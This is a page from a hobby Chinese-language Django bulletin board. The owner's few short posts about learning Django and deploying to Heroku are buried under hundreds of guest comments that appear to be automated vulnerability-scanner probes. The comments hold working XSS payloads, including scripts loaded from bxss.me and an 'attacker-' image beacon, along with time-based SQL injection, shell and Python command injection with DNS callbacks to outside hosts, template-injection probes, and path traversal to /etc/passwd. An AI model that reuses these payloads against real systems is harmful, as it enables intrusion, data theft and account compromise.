BBS Beta版

BBS 全名為 Bulletin Board System 是一個相互交流的小基地。 花了一些時間練習 Django MTV 觀念並加強 CRUD 觀念,希望你們操作上順手哦! 會員可以在 BBS 發布文章、分享意見、留言、案讚、分享, 訪客可以「留言」、「讚」、「噓」功能,歡迎使用,謝謝你們!


[爆卦]   4577
鄉民  我是機器人 於  2021-04-26 00:45:45  發布

卻遲遲創世神


我是機器人說: 改

[分享]   1111111111111111111
鄉民  我是機器人 於  2020-12-04 08:06:21  發布

11111111111111111111111111111


[心情]   一個人與 python javascript的戰爭
鄉民  jamie 於  2019-10-02 14:49:57  發布

毅力很重要,但是惰性會影響我


<a HrEF=jaVaScRiPT:>說: 1

訪客說: 1<input autofocus onfocus=Y1a1(9647)>

訪客說: �<img acu onmouseover=Y1a1(92331) //�>

訪客說: 1&lt

訪客<HYOZaf x=9636>說: 1

訪客說: %31%3C%53%63%52%69%50%74%20%3E%59%31%61%31%289217%29%3C%2F%73%43%72%69%70%54%3E

訪客說: 1<img/src=">" onerror=alert(9974)>

訪客說: 1<img src=xyz OnErRor=Y1a1(9428)>

acx[[${98991*97996}]]xca說: 1

訪客說: 1<body onload=Y1a1(9709)>

訪客說: 1<iframe src='data:text/html

訪客說: 1<isindex type=image src=1 onerror=Y1a1(9122)>

訪客說: 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9523></ScRiPt>

訪客說: 1<ScRiPt >Y1a1(9923)</ScRiPt>

訪客說: 1<ScR<ScRiPt>IpT>Y1a1(9590)</sCr<ScRiPt>IpT>

訪客說: 1<script>Y1a1(9136)</script>

訪客說: 1<WX1SPB>M27FV[!+!]</WX1SPB>

acx{{98991*97996}}xca說: 1

訪客說: 1<ScRiPt >Y1a1(9442)</ScRiPt>

訪客說: acx__${98991*97996}__::.x

訪客說: acx[[${98991*97996}]]xca

訪客說: acx{{98991*97996}}xca

訪客9273208說: 1

訪客說: 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

訪客說: 1<rC9OsR<

訪客說: <th:t="${acx}#foreach

訪客說: 1<img sRc='http://attacker-9223/log.php?

訪客說: <%={{={@{#{${acx}}%>

訪客說: acux4946��z1��z2a�bcxuca4946

訪客說: 1<hRVuPB x=9473>

訪客說: <a HrEF=http://xss.bxss.me></a>

訪客說: acu9736<s1﹥s2ʺs3ʹuca9736

訪客說: 1<WN9X5A>RCUWU[!+!]</WN9X5A>

訪客&lt說: 1

訪客說: 19070458

<th:t="${acx}#foreach說: 1

訪客說: 1}body{acu:Expre/**/SSion(Y1a1(9649))}

訪客說: <a HrEF=jaVaScRiPT:>

訪客說: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

訪客說: m66KUCSc')) OR 208=(SELECT 208 FROM PG_SLEEP(15))--

訪客說: Fimo3AsZ') OR 866=(SELECT 866 FROM PG_SLEEP(15))--

訪客說: H1QVQYCW' OR 663=(SELECT 663 FROM PG_SLEEP(15))--

訪客說: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

訪客說: -5) OR 575=(SELECT 575 FROM PG_SLEEP(15))--

訪客說: |echo bbehqt$()\ bjkukt\nz^xyu||a #' |echo bbehqt$()\ bjkukt\nz^xyu||a #|" |echo bbehqt$()\ bjkukt\nz^xyu||a #

訪客說: &echo aqkfkq$()\ wuunba\nz^xyu||a #' &echo aqkfkq$()\ wuunba\nz^xyu||a #|" &echo aqkfkq$()\ wuunba\nz^xyu||a #

NNCiiVkA說: 1

訪客說: echo dbstvb$()\ rahbxu\nz^xyu||a #' &echo dbstvb$()\ rahbxu\nz^xyu||a #|" &echo dbstvb$()\ rahbxu\nz^xyu||a #

訪客說: -5 OR 411=(SELECT 411 FROM PG_SLEEP(15))--

訪客說: -1' OR 2+900-900-1=0+0+0+1 --

訪客說: '+response.write(9554750*9288184)+'

訪客說: response.write(9554750*9288184)

@@nW9Kd說: 1

訪客說: -1 OR 2+761-761-1=0+0+0+1

訪客說: -1)

-1 OR 2+291-291-1=0+0+0+1說: 1

訪客說: 1

訪客說: 1

訪客說: 1

訪客說: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

訪客說: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

訪客說: `(nslookup hityfxixguzsx551ae.bxss.me||perl -e "gethostbyname('hityfxixguzsx551ae.bxss.me')")`

訪客說: bxss.me

訪客說: http://bxss.me/t/fit.txt?.jpg

訪客說: 1

訪客說: ^(#$!@#$)(()))******

訪客說: '"()

訪客說: |(nslookup hittygjvaflss0ec90.bxss.me||perl -e "gethostbyname('hittygjvaflss0ec90.bxss.me')")

訪客說: !(()&&!|*|*|

訪客說: )

訪客說: Http://bxss.me/t/fit.txt

${9999584+9999330}說: 1

訪客說: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

訪客說: 1&n961621=v969164

訪客說: ${9999567+10000312}

12345'"\'\")說: 1

訪客說: to@example.com> bcc:7171.18302-10798.18302.e45d5.18584.2@bxss.me

訪客說: 1<esi:include src="http://bxss.me/rpb.png"/>

訪客說: 1 bcc:7171.18302-10796.18302.e45d5.18584.2@bxss.me

訪客說: $(nslookup hitcmkggwhdoh5b6f1.bxss.me||perl -e "gethostbyname('hitcmkggwhdoh5b6f1.bxss.me')")

訪客說: 12345'"\'\")

訪客說: 1'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=7171&r=18302-10795&h=18302-e45d5-2&"></script>

訪客說: (nslookup hitzorepsjkwmda582.bxss.me||perl -e "gethostbyname('hitzorepsjkwmda582.bxss.me')")

訪客說: w1B7OWDe

訪客說: "+response.write(9554750*9288184)+"

1'"說: 1

bwb7kqVp'說: 1

訪客說: @@8NQ6Q

訪客說: 1'"

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

訪客說: -1)) OR 321=(SELECT 321 FROM PG_SLEEP(15))--

訪客說: ADozlU0L'

訪客說: 1 waitfor delay '0:0:15' --

訪客說: -1

訪客說: if(now()=sysdate(),sleep(15),0)

訪客說: -1" OR 2+398-398-1=0+0+0+1 --

訪客說: -1' OR 2+836-836-1=0+0+0+1 or 'R4onelIU'='

訪客說: -1 OR 2+410-410-1=0+0+0+1 --

訪客說: 1

訪客說: 1

)說: 1

訪客<kzXukz<說: 1

acx__${98991*97996}__::.x說: 1

訪客說: 1

訪客說: 1

訪客說: 1

<%={{={@{#{${acx}}%>說: 1

acu5683<s1﹥s2ʺs3ʹuca5683說: 1

訪客說: 1<ifRAme sRc=9056.com></IfRamE>

訪客說: 1L8Scw <ScRiPt >Y1a1(9751)</ScRiPt>

訪客說: 1<% contenteditable onresize=Y1a1(9142)>

訪客說: 1\u003CScRiPt\Y1a1(9868)\u003C/sCripT\u003E

訪客說: 1<img src=//xss.bxss.me/t/dot.gif onload=Y1a1(9948)>

訪客說: 1<ScRiPt >Y1a1(9442)</ScRiPt>

訪客說: 1

訪客說: 1

訪客說: 1

../訪客說: 1

訪客說: 1

訪客說: ../1

訪客說: 1

訪客說: '"()&%<acx><ScRiPt >Y1a1(9354)</ScRiPt>

訪客說: ../../../../../../../../../../windows/win.ini

訪客說: ../../../../../../../../../../etc/passwd

訪客說: 1'"()&%<acx><ScRiPt >Y1a1(9237)</ScRiPt>

<!--說: 1

index.php/.說: 1

'"說: 1

訪客說: <!--

index.php說: 1

訪客說: '"

/xfs.bxss.me說: 1

訪客說: index.php/.

訪客說: /xfs.bxss.me

訪客說: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

訪客說: http://hitqxxdsvfytx.bxss.me/

bxss.me/t/xss.html?%00說: 1

訪客說: index.php

'.print(md5(31337)).'說: 1

${@print(md5(31337))}\說: 1

訪客說: bxss.me/t/xss.html?%00

${@print(md5(31337))}說: 1

訪客說: HttP://bxss.me/t/xss.html?%00

"說: 1

'說: 1

訪客說: "+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitcmwoqtxexcbb0c2.'+'bxss.me')+"

訪客說: '+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitcmwoqtxexcbb0c2."+"bxss.me")+'

訪客說: '.print(md5(31337)).'

訪客說: ${@print(md5(31337))}\

訪客說: str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitcmwoqtxexcbb0c2.'+'bxss.me')

訪客說: ${@print(md5(31337))}

訪客說: "

bxss.me說: 1

訪客說: '

Http://bxss.me/t/fit.txt說: 1

^(#$!@#$)(()))******說: 1

訪客說: ".gethostbyname(lc("hitxz"."tftqhivma59ae.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(80).chr(116).chr(89)."

訪客說: '.gethostbyname(lc('hitnv'.'uzzmrpix714b4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(87).chr(103).chr(75).'

訪客&n945498=v995822說: 1

'"()說: 1

!(()&&!|*|*|說: 1

訪客說: hi

jamie說: 10/20把html重構,之前寫太亂了!!!

jamie說: 要持之以恆,才能達成哦!!!

[心情]   BBS 部署至 Heroku 成功了!
鄉民  jamie 於  2019-10-01 16:00:47  發布

心中大石頭總算放下來了!算是自己實作出網站了! 現在應該達成 Make it work 的第一步了 接下來是 Make it right and Make it fast !!


<a HrEF=jaVaScRiPT:>說: 1

訪客&lt說: 1

訪客說: /xfs.bxss.me

訪客說: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1 OR 2+875-875-1=0+0+0+1說: 1

訪客說: 1

訪客9752645說: 1

訪客說: 1

bxss.me/t/xss.html?%00說: 1

訪客說: bxss.me/t/xss.html?%00

訪客說: 1<WGYNXG>XXHQF[!+!]</WGYNXG>

訪客說: 1&lt

訪客說: acx__${98991*97996}__::.x

訪客說: acx[[${98991*97996}]]xca

訪客說: str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitgzvpirwnvm433bc.'+'bxss.me')

訪客說: @@1JMTD

'.print(md5(31337)).'說: 1

訪客說: 1\u003CScRiPt\aWRO(9420)\u003C/sCripT\u003E

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

訪客說: ".gethostbyname(lc("hitbc"."nyljkxgnfcab6.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(74).chr(119).chr(81)."

${@print(md5(31337))}說: 1

"說: 1

訪客說: acx{{98991*97996}}xca

<th:t="${acx}#foreach說: 1

訪客說: '.print(md5(31337)).'

訪客說: ${@print(md5(31337))}\

訪客說: ${@print(md5(31337))}

訪客說: uuMxykSz')) OR 738=(SELECT 738 FROM PG_SLEEP(15))--

訪客說: '

訪客說: '"()

^(#$!@#$)(()))******說: 1

JudhGywJ'說: 1

)說: 1

訪客說: `(nslookup hitykycgjumpn163c8.bxss.me||perl -e "gethostbyname('hitykycgjumpn163c8.bxss.me')")`

訪客說: ^(#$!@#$)(()))******

訪客說: -1)) OR 96=(SELECT 96 FROM PG_SLEEP(15))--

訪客說: if(now()=sysdate(),sleep(15),0)

訪客說: %31%3C%53%63%52%69%50%74%20%3E%61%57%52%4F%289433%29%3C%2F%73%43%72%69%70%54%3E

訪客說: 1<img/src=">" onerror=alert(9262)>

訪客說: 1

<%={{={@{#{${acx}}%>說: 1

訪客說: |(nslookup hitjiceoulbdhf4280.bxss.me||perl -e "gethostbyname('hitjiceoulbdhf4280.bxss.me')")

Http://bxss.me/t/fit.txt說: 1

訪客說: 1<WRZQSM>TEWTB[!+!]</WRZQSM>

訪客說: bxss.me

訪客說: http://bxss.me/t/fit.txt?.jpg

12345'"\'\")說: 1

訪客說: <th:t="${acx}#foreach

訪客說: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

訪客說: -1" OR 2+83-83-1=0+0+0+1 --

<!--說: 1

訪客說: 1<body onload=aWRO(9746)>

訪客說: 1Tj4M2 <ScRiPt >aWRO(9716)</ScRiPt>

訪客說: 1 waitfor delay '0:0:15' --

訪客說: 1<% contenteditable onresize=aWRO(9325)>

訪客說: ${9999190+9999052}

訪客說: 1<esi:include src="http://bxss.me/rpb.png"/>

訪客說: 12345'"\'\")

訪客說: -1)

訪客說: 1

訪客說: $(nslookup hitjhpocmthjsb4388.bxss.me||perl -e "gethostbyname('hitjhpocmthjsb4388.bxss.me')")

訪客說: ../1

訪客說: 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9940></ScRiPt>

訪客說: 1 bcc:7171.18302-10595.18302.156f0.18584.2@bxss.me

訪客說: -1

訪客說: acu4711<s1﹥s2ʺs3ʹuca4711

訪客說: ../../../../../../../../../../windows/win.ini

訪客說: ../../../../../../../../../../etc/passwd

訪客說: 1}body{acu:Expre/**/SSion(aWRO(9231))}

訪客說: |echo iarmuo$()\ hehpdw\nz^xyu||a #' |echo iarmuo$()\ hehpdw\nz^xyu||a #|" |echo iarmuo$()\ hehpdw\nz^xyu||a #

訪客說: o3iYLG7T

訪客說: '"

訪客說: echo fcqoak$()\ occhto\nz^xyu||a #' &echo fcqoak$()\ occhto\nz^xyu||a #|" &echo fcqoak$()\ occhto\nz^xyu||a #

訪客說: '"()&%<acx><ScRiPt >aWRO(9664)</ScRiPt>

訪客說: "+response.write(9588977*9316955)+"

訪客說: '+response.write(9588977*9316955)+'

訪客說: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

訪客說: 1

'"說: 1

訪客說: 1'"()&%<acx><ScRiPt >aWRO(9031)</ScRiPt>

訪客說: http://hitwscczltzxr.bxss.me/

訪客說: 19801117

訪客說: <a HrEF=http://xss.bxss.me></a>

bxss.me說: 1

訪客<nEWxsl<說: 1

訪客<hZWL0w x=9426>說: 1

acx__${98991*97996}__::.x說: 1

acx[[${98991*97996}]]xca說: 1

acx{{98991*97996}}xca說: 1

訪客說: 1

訪客說: 1

acu8168<s1﹥s2ʺs3ʹuca8168說: 1

訪客說: 1<DxO62R<

訪客說: 1<img sRc='http://attacker-9131/log.php?

訪客說: 1<XeamQK x=9107>

訪客說: 1<ifRAme sRc=9533.com></IfRamE>

訪客說: <a HrEF=jaVaScRiPT:>

訪客說: 1<input autofocus onfocus=aWRO(9660)>

訪客說: �<img acu onmouseover=aWRO(94361) //�>

@@hyeDo說: 1

1'"說: 1

訪客說: 1<img src=xyz OnErRor=aWRO(9011)>

訪客說: 1<img src=//xss.bxss.me/t/dot.gif onload=aWRO(9877)>

訪客說: 1<iframe src='data:text/html

訪客說: 1<isindex type=image src=1 onerror=aWRO(9061)>

訪客說: 1<ScRiPt >aWRO(9745)</ScRiPt>

訪客說: 1<ScR<ScRiPt>IpT>aWRO(9620)</sCr<ScRiPt>IpT>

訪客說: 1<script>aWRO(9625)</script>

訪客說: 1

訪客說: 1

訪客說: 1<ScRiPt >aWRO(9259)</ScRiPt>

訪客說: 1'"

訪客說: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

訪客說: TcTgUFv2') OR 345=(SELECT 345 FROM PG_SLEEP(15))--

訪客說: i5dDn1Xw' OR 192=(SELECT 192 FROM PG_SLEEP(15))--

訪客說: -5) OR 930=(SELECT 930 FROM PG_SLEEP(15))--

訪客說: -5 OR 505=(SELECT 505 FROM PG_SLEEP(15))--

訪客說: 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

訪客說: 1

訪客說: 2fBVPpbR'

訪客說: 1

訪客說: <%={{={@{#{${acx}}%>

訪客說: acux4472��z1��z2a�bcxuca4472

訪客說: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

訪客說: <!--

/xfs.bxss.me說: 1

index.php/.說: 1

index.php說: 1

訪客說: index.php/.

訪客說: index.php

訪客說: "+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitgzvpirwnvm433bc.'+'bxss.me')+"

訪客說: HttP://bxss.me/t/xss.html?%00

訪客說: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

訪客說: '+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitgzvpirwnvm433bc."+"bxss.me")+'

訪客&n923283=v978672說: 1

${9999568+9999795}說: 1

${@print(md5(31337))}\說: 1

'說: 1

訪客說: '.gethostbyname(lc('hitkj'.'hitoifcg80247.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(68).chr(101).chr(82).'

訪客說: "

'"()說: 1

!(()&&!|*|*|說: 1

訪客說: 1&n969327=v983044

訪客說: !(()&&!|*|*|

訪客說: )

訪客說: 1

${9999568+9999795}說: 1

訪客說: |(nslookup hitjiceoulbdhf4280.bxss.me||perl -e "gethostbyname('hitjiceoulbdhf4280.bxss.me')")

訪客說: Http://bxss.me/t/fit.txt

訪客說: -1' OR 2+358-358-1=0+0+0+1 or 'o3Ofg6xd'='

訪客說: -1' OR 2+840-840-1=0+0+0+1 --

訪客說: -1 OR 2+591-591-1=0+0+0+1

訪客說: -1 OR 2+625-625-1=0+0+0+1 --

訪客說: 1

../訪客說: 1

訪客說: to@example.com> bcc:7171.18302-10596.18302.156f0.18584.2@bxss.me

訪客說: 1

訪客說: (nslookup hitdqiqxvissm72efc.bxss.me||perl -e "gethostbyname('hitdqiqxvissm72efc.bxss.me')")

J1j7D80c說: 1

訪客說: &echo xcldrw$()\ czjmsz\nz^xyu||a #' &echo xcldrw$()\ czjmsz\nz^xyu||a #|" &echo xcldrw$()\ czjmsz\nz^xyu||a #

訪客說: 1'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=7171&r=18302-10590&h=18302-156f0-2&"></script>

訪客說: response.write(9588977*9316955)

訪客說: 1

我是機器人說: ?

[分享]   紀錄一下卡住的地方
鄉民  jamie 於  2019-10-01 15:45:03  發布

在表單評論中 ForeignKey使用卡好久.... 最後還是決定在 Views 處理比較快


訪客說: @@xzsRb

訪客說: 1'"

bxss.me/t/xss.html?%00說: 1

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),3)||'

訪客說: 1<o8l2CY x=9211>

訪客說: 1<ifRAme sRc=9863.com></IfRamE>

訪客說: 1<ScR<ScRiPt>IpT>E3oR(9687)</sCr<ScRiPt>IpT>

訪客說: HttP://bxss.me/t/xss.html?%00

訪客說: 1

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||'

訪客說: 1<WDVANV>OKXHH[!+!]</WDVANV>

12345'"\'\")說: 1

訪客說: "

訪客說: 12Ntq8 <ScRiPt >E3oR(9664)</ScRiPt>

訪客說: "+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitohcitpnbqq73a7c.'+'bxss.me')+"

訪客說: '+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitohcitpnbqq73a7c."+"bxss.me")+'

訪客說: str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitohcitpnbqq73a7c.'+'bxss.me')

^(#$!@#$)(()))******說: 1

訪客說: 1<% contenteditable onresize=E3oR(9649)>

訪客說: 1}body{acu:Expre/**/SSion(E3oR(9260))}

!(()&&!|*|*|說: 1

Http://bxss.me/t/fit.txt說: 1

訪客說: <a HrEF=jaVaScRiPT:>

)說: 1

訪客說: 12345'"\'\")

訪客說: acx{{98991*97996}}xca

訪客說: 1

訪客&n910455=v953699說: 1

訪客說: !(()&&!|*|*|

@@WjiUo說: 1

訪客說: 1

訪客&lt說: 1

訪客說: 1

訪客說: 1

訪客說: 1&n953686=v945706

訪客說: <%={{={@{#{${acx}}%>

<th:t="${acx}#foreach說: 1

訪客說: 1\u003CScRiPt\E3oR(9979)\u003C/sCripT\u003E

acu7919<s1﹥s2ʺs3ʹuca7919說: 1

訪客說: 1<esi:include src="http://bxss.me/rpb.png"/>

訪客說: zHzmV9fe' OR 545=(SELECT 545 FROM PG_SLEEP(15))--

../訪客說: 1

訪客說: 19637750

訪客說: -1)) OR 27=(SELECT 27 FROM PG_SLEEP(15))--

訪客說: ../1

訪客說: to@example.com> bcc:7171.18302-10390.18302.aef48.18584.2@bxss.me

訪客說: 1 bcc:7171.18302-10389.18302.aef48.18584.2@bxss.me

訪客9546190說: 1

訪客說: 1'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=7171&r=18302-10387&h=18302-aef48-2&"></script>

訪客說: ../../../../../../../../../../windows/win.ini

訪客說: ../../../../../../../../../../etc/passwd

訪客說: $(nslookup hityopqdkggmo9ebd8.bxss.me||perl -e "gethostbyname('hityopqdkggmo9ebd8.bxss.me')")

Z5YwRn74說: 1

訪客說: 1<img src=xyz OnErRor=E3oR(9241)>

-1 OR 2+653-653-1=0+0+0+1說: 1

'"說: 1

訪客說: 1<img src=//xss.bxss.me/t/dot.gif onload=E3oR(9725)>

訪客說: -5) OR 907=(SELECT 907 FROM PG_SLEEP(15))--

訪客說: '"

訪客說: 1<body onload=E3oR(9530)>

訪客說: 1

訪客說: response.write(9669561*9516674)

訪客說: -5 OR 193=(SELECT 193 FROM PG_SLEEP(15))--

訪客說: S13Mc2N2'

訪客說: 1 waitfor delay '0:0:15' --

訪客說: -1)

/xfs.bxss.me說: 1

訪客說: 1<xuS93h<

訪客說: 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

訪客說: 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

訪客說: )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

訪客說: if(now()=sysdate(),sleep(15),0)

訪客說: 1<img sRc='http://attacker-9908/log.php?

訪客說: 1

訪客說: -1' OR 2+535-535-1=0+0+0+1 --

訪客說: http://hitthjroxxbaq.bxss.me/

index.php說: 1

訪客說: index.php/.

${@print(md5(31337))}\說: 1

訪客說: 1

訪客說: -1 OR 2+167-167-1=0+0+0+1

訪客說: -1 OR 2+173-173-1=0+0+0+1 --

訪客說: 1

訪客說: 1

bxss.me說: 1

訪客<XpRY3b<說: 1

訪客<AOvkae x=9560>說: 1

<a HrEF=jaVaScRiPT:>說: 1

acx__${98991*97996}__::.x說: 1

acx[[${98991*97996}]]xca說: 1

acx{{98991*97996}}xca說: 1

訪客說: 1

1'"說: 1

6RO3aIIx'說: 1

<%={{={@{#{${acx}}%>說: 1

訪客說: 1<WAQZUX>IQZX7[!+!]</WAQZUX>

訪客說: <a HrEF=http://xss.bxss.me></a>

訪客說: 1<input autofocus onfocus=E3oR(9198)>

訪客說: �<img acu onmouseover=E3oR(91961) //�>

訪客說: 1&lt

訪客說: %31%3C%53%63%52%69%50%74%20%3E%45%33%6F%52%289184%29%3C%2F%73%43%72%69%70%54%3E

訪客說: 1<img/src=">" onerror=alert(9830)>

訪客說: 1<iframe src='data:text/html

訪客說: 1<isindex type=image src=1 onerror=E3oR(9186)>

訪客說: 1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9795></ScRiPt>

訪客說: 1<ScRiPt >E3oR(9611)</ScRiPt>

訪客說: 1<script>E3oR(9537)</script>

訪客說: 1<ScRiPt >E3oR(9717)</ScRiPt>

訪客說: acx__${98991*97996}__::.x

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

訪客說: acx[[${98991*97996}]]xca

訪客說: 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

訪客說: 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

訪客說: <th:t="${acx}#foreach

訪客說: acux9616��z1��z2a�bcxuca9616

訪客說: VrYNX3Ds')) OR 336=(SELECT 336 FROM PG_SLEEP(15))--

訪客說: acu6689<s1﹥s2ʺs3ʹuca6689

訪客說: '"()&%<acx><ScRiPt >E3oR(9476)</ScRiPt>

訪客說: YZptHmWX') OR 492=(SELECT 492 FROM PG_SLEEP(15))--

<!--說: 1

訪客說: <!--

訪客說: 1'"()&%<acx><ScRiPt >E3oR(9017)</ScRiPt>

訪客說: dNdSCa9S') OR 76=(SELECT 76 FROM PG_SLEEP(3))--

index.php/.說: 1

訪客說: /xfs.bxss.me

'.print(md5(31337)).'說: 1

訪客說: index.php

${@print(md5(31337))}說: 1

'"()說: 1

"說: 1

訪客說: bxss.me/t/xss.html?%00

'說: 1

訪客說: '.print(md5(31337)).'

訪客說: ${@print(md5(31337))}\

訪客說: ${@print(md5(31337))}

訪客說: '

訪客說: ".gethostbyname(lc("hitih"."nwiywplz7aed6.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(79).chr(97).chr(87)."

訪客說: 1

訪客說: '.gethostbyname(lc('hitsv'.'axeknmlc090fd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(72).chr(104).chr(78).'

訪客說: ^(#$!@#$)(()))******

訪客說: '"()

訪客說: bxss.me

訪客說: `(nslookup hitchtupgfvbx998e9.bxss.me||perl -e "gethostbyname('hitchtupgfvbx998e9.bxss.me')")`

訪客說: )

訪客說: http://bxss.me/t/fit.txt?.jpg

訪客說: Http://bxss.me/t/fit.txt

${9999593+10000429}說: 1

訪客說: ${9999288+10000454}

訪客說: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

訪客說: |(nslookup hitujeecxvbls45ca9.bxss.me||perl -e "gethostbyname('hitujeecxvbls45ca9.bxss.me')")

訪客說: 1

訪客說: 1

訪客說: SNrSmWE4

訪客說: (nslookup hitanhjkauuivc2ade.bxss.me||perl -e "gethostbyname('hitanhjkauuivc2ade.bxss.me')")

訪客說: |echo qmlqck$()\ cqkyde\nz^xyu||a #' |echo qmlqck$()\ cqkyde\nz^xyu||a #|" |echo qmlqck$()\ cqkyde\nz^xyu||a #

訪客說: &echo jwyhwf$()\ nxciyz\nz^xyu||a #' &echo jwyhwf$()\ nxciyz\nz^xyu||a #|" &echo jwyhwf$()\ nxciyz\nz^xyu||a #

訪客說: echo gyeicu$()\ heafbz\nz^xyu||a #' &echo gyeicu$()\ heafbz\nz^xyu||a #|" &echo gyeicu$()\ heafbz\nz^xyu||a #

訪客說: "+response.write(9669561*9516674)+"

訪客說: '+response.write(9669561*9516674)+'

訪客說: -1

訪客說: (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

訪客說: if(now()=sysdate(),sleep(6),0)

訪客說: -1" OR 2+813-813-1=0+0+0+1 --

訪客說: -1' OR 2+517-517-1=0+0+0+1 or 'sJkrKnop'='

訪客說: 0

jamie說: 訪客也可以留言哦!

[分享]   BBS弄好啦!!! 灑花
鄉民  jamie 於  2019-09-30 03:15:45  發布

希望大家用的開心! ++++


訪客說: '.gethostbyname(lc('hitwd'.'ddhtppmn3e3a1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(79).chr(117).chr(88).'

訪客說: "+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitvqtvtgnmiue4736.'+'bxss.me')+"

訪客9417195說: 1

訪客說: 1

訪客說: -1)

index.php/.說: 1

../訪客說: 1

訪客說: 1

訪客說: -1

訪客說: 1<652glE x=9071>

訪客說: 1<ifRAme sRc=9614.com></IfRamE>

訪客說: |(nslookup hiteunotrhmww657b8.bxss.me||perl -e "gethostbyname('hiteunotrhmww657b8.bxss.me')")

訪客說: 1

訪客說: 1<% contenteditable onresize=9gu7(9252)>

訪客說: 1}body{acu:Expre/**/SSion(9gu7(9988))}

acu1518<s1﹥s2ʺs3ʹuca1518說: 1

12345'"\'\")說: 1

訪客說: 1<RimEt0<

訪客說: 1

訪客說: "+response.write(9312040*9163619)+"

訪客說: '+response.write(9312040*9163619)+'

訪客說: �<img acu onmouseover=9gu7(94121) //�>

訪客說: acu6892<s1﹥s2ʺs3ʹuca6892

訪客說: 1<iframe src='data:text/html

訪客說: 1&n935868=v988798

訪客說: '"()&%<acx><ScRiPt >DdYw(9187)</ScRiPt>

訪客說: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

訪客說: 1\u003CScRiPt\9gu7(9170)\u003C/sCripT\u003E

訪客說: %31%3C%53%63%52%69%50%74%20%3E%39%67%75%37%289858%29%3C%2F%73%43%72%69%70%54%3E

訪客<3wZDf0<說: 1

訪客說: @@i5l0n

訪客說: $(nslookup hitmdmxzgwzvb30d81.bxss.me||perl -e "gethostbyname('hitmdmxzgwzvb30d81.bxss.me')")

訪客說: 1<body onload=9gu7(9764)>

訪客說: index.php

訪客說: -1" OR 2+440-440-1=0+0+0+1 --

訪客說: 12345'"\'\")

訪客說: 1<ScRiPt >9gu7(9652)</ScRiPt>

訪客說: ../1

訪客說: 1<script>9gu7(9643)</script>

<!--說: 1

訪客說: 1<UDSVnC x=9793>

訪客說: acx__${98991*97996}__::.x

訪客說: 1<ifRAme sRc=9900.com></IfRamE>

訪客說: to@example.com> bcc:7171.18302-10064.18302.c43e9.18584.2@bxss.me

訪客說: 1<ScR<ScRiPt>IpT>p5VR(9706)</sCr<ScRiPt>IpT>

訪客說: `(nslookup hitenxonfiwkj19c4b.bxss.me||perl -e "gethostbyname('hitenxonfiwkj19c4b.bxss.me')")`

訪客說: |(nslookup hitgoklssagetcaf38.bxss.me||perl -e "gethostbyname('hitgoklssagetcaf38.bxss.me')")

訪客&lt說: 1

訪客說: 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

訪客說: '"

訪客說: 1

訪客說: 1<WNH2JU>ULUTR[!+!]</WNH2JU>

訪客說: /xfs.bxss.me

訪客說: |echo kcdufn$()\ ftbhab\nz^xyu||a #' |echo kcdufn$()\ ftbhab\nz^xyu||a #|" |echo kcdufn$()\ ftbhab\nz^xyu||a #

訪客<F59iAA x=9347>說: 1

